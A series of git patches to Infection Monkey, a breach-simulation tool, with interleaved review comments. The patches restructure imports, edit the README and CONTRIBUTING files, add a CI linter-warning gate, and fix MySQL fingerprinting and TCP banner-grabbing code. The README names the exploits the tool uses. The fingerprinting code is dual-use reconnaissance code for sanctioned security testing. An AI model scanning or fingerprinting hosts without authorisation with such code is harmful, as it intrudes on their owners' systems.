RemoteRunAwsService +from monkey_island.cc.services.representations import output_json +from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.resources.test.monkey_test import MonkeyTest from monkey_island.cc.resources.test.log_test import LogTest diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/services/representations.py similarity index 100% rename from monkey/monkey_island/cc/resources/representations.py rename to monkey/monkey_island/cc/services/representations.py 
diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py similarity index 95% rename from monkey/monkey_island/cc/resources/representations_test.py rename to monkey/monkey_island/cc/services/representations_test.py index c50394117..d6c7f99d7 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/services/representations_test.py @@ -1,6 +1,6 @@ from unittest import TestCase from datetime import datetime -from .representations import normalize_obj +from monkey_island.cc.services.representations import normalize_obj import bson From c68ea48b0b8f08044753abc19858b387292472cd Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 10:19:39 +0200 Subject: [PATCH 45/53] Added unit tests guide to the readme. --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index 2d7490bfe..dd1d7982b 100644 --- a/README.md +++ b/README.md 
@@ -1,31 +1,27 @@ -Infection Monkey -==================== +# Infection Monkey [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) [![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases) ![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey) ![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey) ## Data center Security Testing Tool ------------------------- Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. - + The Infection Monkey is comprised of two parts: * Monkey - A tool which infects other machines and propagates to them * Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center To read more about the Monkey, visit http://infectionmonkey.com -Main Features ---------------- - +## Main Features The Infection Monkey uses the following techniques and exploits to propagate to other machines. * Multiple propagation techniques: 
@@ -41,15 +37,13 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SambaCry * Elastic Search (CVE-2015-1427) -Setup -------------------------------- +## Setup Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/). The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility). -Building the Monkey from source -------------------------------- +## Building the Monkey from source To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder. If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself) and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island). @@ -61,8 +55,14 @@ and follow the instructions at the readme files under [infection_monkey](infecti | Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) | | Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) | -License -======= +## Tests +### Unit Tests +In order to run all of the Unit Tests, run the command `python -m pytest` in the `monkey` directory. + +### Blackbox tests +In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`. + +# License Copyright (c) Guardicore Ltd See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3). From ea5ae678912bbf15a81119213c5efbddadf27cca Mon Sep 17 00:00:00 2001 
From: Shay Nehmad
Date: Tue, 5 Nov 2019 12:05:45 +0200
Subject: [PATCH 46/53] Updated flake8 to fail if number of warnings is too high
---
.travis.yml | 28 +++++++++++++++++++++++-----
1 file changed, 23 insertions(+), 5 deletions(-)
diff --git a/.travis.yml b/.travis.yml
index d5103b989..365432f24 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,23 +1,41 @@ # Infection Monkey travis.yml. See Travis documentation for information about this file structure. group: travis_latest + language: python + cache: pip + python: - 3.7 + install: - pip install -r monkey/monkey_island/requirements.txt # for unit tests - pip install flake8 pytest dlint # for next stages - pip install -r monkey/infection_monkey/requirements_linux.txt # for unit tests + before_script: -- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics # Check syntax errors -- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics # warn about linter issues. --exit-zero - # means this stage will not fail the build. This is (hopefully) a temporary measure until all warnings are suppressed. -- python monkey/monkey_island/cc/set_server_config.py testing # Set the server config to `testing`, for the UTs to use - # mongomaock and pass. +# Check syntax errors and fail the build if any are found. +- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics + +# Warn about linter issues. +# --exit-zero forces Flake8 to use the exit status code 0 even if there are errors, which means this will NOT fail the build. +# --count will print the total number of errors. +# --statistics Count the number of occurrences of each error/warning code and print a report. +# The output is redirected to a file. +- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics > flake8_warnings.txt +# Display the linter issues +- cat flake8_warnings.txt +# Make sure that we haven't increased the amount of warnings. +- test (`tail -n 1 flake8_warnings.txt` -lt 180) + +# Set the server config to `testing`, for the UTs to use mongomaock and pass. +- python monkey/monkey_island/cc/set_server_config.py testing + script: - cd monkey # This is our source dir - python -m pytest # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path. 
+ notifications: slack: # Notify to slack rooms: From d52d00e5d9bfa75c100d2dcabbf81964241a1897 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:13:38 +0200 Subject: [PATCH 47/53] Trying to make the test work --- .travis.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 365432f24..fb773b387 100644 --- a/.travis.yml +++ b/.travis.yml @@ -27,7 +27,8 @@ before_script: # Display the linter issues - cat flake8_warnings.txt # Make sure that we haven't increased the amount of warnings. -- test (`tail -n 1 flake8_warnings.txt` -lt 180) +- WARNINGS_AMOUNT_UPPER_LIMIT=180 +- if (test $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT); echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi # Set the server config to `testing`, for the UTs to use mongomaock and pass. - python monkey/monkey_island/cc/set_server_config.py testing From bbdc12a412d0c6d3678f2729dd4cc4b77610b176 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:19:46 +0200 Subject: [PATCH 48/53] Update .travis.yml --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index fb773b387..44163be0d 100644 --- a/.travis.yml +++ b/.travis.yml 
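Review bot: The warning gate added to `before_script` fails open: `tail -n 1 flake8_warnings.txt` is taken to be the `--count` total, but only stdout is redirected into the file, and if the last line is empty or non-numeric (flake8 aborting before printing the count, or an extra report line) the integer comparison in `test` errors out with a false result, so the build passes instead of failing. In this hunk the guard also appears not to be valid bash (`test (` puts a bare `(` metacharacter after the command); the following hunk (patch 47) and the first hunk of the next line (patch 48) rework it into `if [ ... ]`, but the unquoted `$(tail ...)` keeps the fail-open behaviour there too, and patch 49 only raises the limit. I would capture and validate the value before comparing: `- WARNINGS_AMOUNT=$(tail -n 1 flake8_warnings.txt)`, `- case "$WARNINGS_AMOUNT" in ''|*[!0-9]*) echo "Could not read the flake8 warning count"; exit 1;; esac`, `- if [ "$WARNINGS_AMOUNT" -gt "$WARNINGS_AMOUNT_UPPER_LIMIT" ]; then echo "Too many warnings! Failing this build."; exit 1; fi`.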
@@ -28,7 +28,7 @@ before_script: - cat flake8_warnings.txt # Make sure that we haven't increased the amount of warnings. - WARNINGS_AMOUNT_UPPER_LIMIT=180 -- if (test $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT); echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi +- if [ $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi # Set the server config to `testing`, for the UTs to use mongomaock and pass. - python monkey/monkey_island/cc/set_server_config.py testing From c69766650cebb56bc3f563cdc43390947fa8a280 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:22:55 +0200 Subject: [PATCH 49/53] Update upper limit to actual current amount of linter warnings --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 44163be0d..d6b9ca212 100644 --- a/.travis.yml +++ b/.travis.yml @@ -27,7 +27,7 @@ before_script: # Display the linter issues - cat flake8_warnings.txt # Make sure that we haven't increased the amount of warnings. -- WARNINGS_AMOUNT_UPPER_LIMIT=180 +- WARNINGS_AMOUNT_UPPER_LIMIT=190 - if [ $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi # Set the server config to `testing`, for the UTs to use mongomaock and pass. From fc063a53781a3f35c52ceb7bfde7b9ccdc37ff46 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Tue, 5 Nov 2019 12:37:51 +0200 Subject: [PATCH 50/53] Fixed mysql finger printer py3 bugs --- monkey/infection_monkey/network/mysqlfinger.py | 2 +- monkey/infection_monkey/network/tools.py | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) 
diff --git a/monkey/infection_monkey/network/mysqlfinger.py b/monkey/infection_monkey/network/mysqlfinger.py
index 123f0ae47..2b9a7c702 100644
--- a/monkey/infection_monkey/network/mysqlfinger.py
+++ b/monkey/infection_monkey/network/mysqlfinger.py
@@ -50,7 +50,7 @@ class MySQLFinger(HostFinger):
 return False
 version, curpos = struct_unpack_tracker_string(data, curpos) # special coded to solve string parsing
-version = version[0]
+version = version[0].decode()
 self.init_service(host.services, SQL_SERVICE, MYSQL_PORT)
 host.services[SQL_SERVICE]['version'] = version
 version = version.split('-')[0].split('.')
diff --git a/monkey/infection_monkey/network/tools.py b/monkey/infection_monkey/network/tools.py
index 0cac7b627..ee20af834 100644
--- a/monkey/infection_monkey/network/tools.py
+++ b/monkey/infection_monkey/network/tools.py
@@ -40,7 +40,7 @@ def struct_unpack_tracker_string(data, index):
 :param index: Position index
 :return: (Data, new index)
 """
-ascii_len = data[index:].find('\0')
+ascii_len = data[index:].find(b'\0')
 fmt = "%ds" % ascii_len
 return struct_unpack_tracker(data, index, fmt)
@@ -159,7 +159,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
 if get_banner and (len(connected_ports_sockets) != 0):
 readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
 # read first BANNER_READ bytes
-banners = [sock.recv(BANNER_READ).decode() if sock in readable_sockets else ""
+banners = [sock.recv(BANNER_READ).decode(errors='ignore') if sock in readable_sockets else ""
 for port, sock in connected_ports_sockets]
 pass
 # try to cleanup
From 63d0e57bb740fad42dbb9fc3dc9bfddfcbca4df4 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Tue, 5 Nov 2019 13:11:15 +0200
Subject: [PATCH 51/53] Added documentation on why we ignore errors when getting tcp banner
---
monkey/infection_monkey/network/tools.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
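Review bot: `version = version[0].decode()` in the MySQLFinger hunk decodes a byte string read from the remote service with strict UTF-8, so a greeting that is not valid UTF-8 raises UnicodeDecodeError out of the fingerprinter instead of the method returning False, while the check_tcp_ports hunk in the same patch deliberately uses `decode(errors='ignore')` for the same kind of input. I would make the two consistent, `version = version[0].decode(errors='ignore')`, or catch UnicodeDecodeError and return False; the enclosing method starts before and continues after the hunk, so I cannot see what its surrounding try block already handles. In the struct_unpack_tracker_string hunk, switching to `find(b'\0')` leaves the unterminated case as it was: a missing NUL yields -1 and a `"-1s"` format, which presumably makes struct raise rather than giving a clean failure, so a guard such as `if ascii_len < 0: raise ValueError("unterminated string")` and a `:raises:` line in the docstring would make the contract explicit.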
diff --git a/monkey/infection_monkey/network/tools.py b/monkey/infection_monkey/network/tools.py
index ee20af834..20d004aff 100644
--- a/monkey/infection_monkey/network/tools.py
+++ b/monkey/infection_monkey/network/tools.py
@@ -158,7 +158,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
 banners = []
 if get_banner and (len(connected_ports_sockets) != 0):
 readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
-# read first BANNER_READ bytes
+# read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string.
 banners = [sock.recv(BANNER_READ).decode(errors='ignore') if sock in readable_sockets else ""
 for port, sock in connected_ports_sockets]
 pass
From 211a4e9d341f69949808db7018bbd970d753c5c8 Mon Sep 17 00:00:00 2001
From: Shay Nehmad
Date: Tue, 5 Nov 2019 13:59:42 +0200
Subject: [PATCH 52/53] Update CONTRIBUTING.md
---
CONTRIBUTING.md | 26 ++++++++++++++++++--------
1 file changed, 18 insertions(+), 8 deletions(-)
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 035eb0124..08a78a815 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,4 +1,4 @@
-# Hi there
+# Hi there 🐵
 Thanks for your interest in making the Monkey -- and therefore, your network -- a better place!
@@ -10,8 +10,13 @@ to reproduce. While we'll try to help anyway, focusing us will help us help you If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk). +## Submitting Issues +* **Do** write a detailed description of your bug and use a descriptive title. +* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug. -## Submitting code +You can look at [this issue](https://github.com/guardicore/monkey/issues/430) for an example. + +## Submitting Code The following is a *short* list of recommendations. PRs that don't match these criteria won't be closed but it'll be harder to merge the changes into the code. 
@@ -24,18 +29,23 @@ The following is a *short* list of recommendations. PRs that don't match these c Also, please submit PRs to the `develop` branch. -#### Unit tests +#### Unit Tests **Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`. Please try to read some of the existing unit testing code, so you can see some examples. -#### Branch naming scheme +#### Branches Naming Scheme **Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; For example, `400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`. -## Issues -* **Do** write a detailed description of your bug and use a descriptive title. -* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug. +#### Continuous Integration +We use [TravisCI](https://travis-ci.com/guardicore/monkey) for automatically checking the correctness and quality of submitted +pull requests. If your build fails, it might be because of one of the following reasons: +* Syntax errors. +* Failing Unit Tests. +* Too many linter warnings. -Thank you for reading this before opening an issue or a PR, you've already doing good! +In any of these cases, you can look for the cause of the failure in the _job log_ in your TravisCI build. + +#### Thank you for reading this before opening an issue or a PR, you're already doing good! From 372d62fb91c43ce2361f6f1621be486640224c2c Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 17:02:40 +0200 Subject: [PATCH 53/53] Fix imports in processing --- .../cc/services/telemetry/processing/processing.py | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) 
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py
index f6ddcd970..0cc461249 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py
@@ -1,7 +1,11 @@
 import logging
-from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, process_state_telemetry, \
-process_exploit_telemetry, process_scan_telemetry, process_system_info_telemetry, process_post_breach_telemetry
+from monkey_island.cc.services.telemetry.processing.exploit import process_exploit_telemetry
+from monkey_island.cc.services.telemetry.processing.post_breach import process_post_breach_telemetry
+from monkey_island.cc.services.telemetry.processing.scan import process_scan_telemetry
+from monkey_island.cc.services.telemetry.processing.state import process_state_telemetry
+from monkey_island.cc.services.telemetry.processing.system_info import process_system_info_telemetry
+from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel_telemetry
 logger = logging.getLogger(__name__)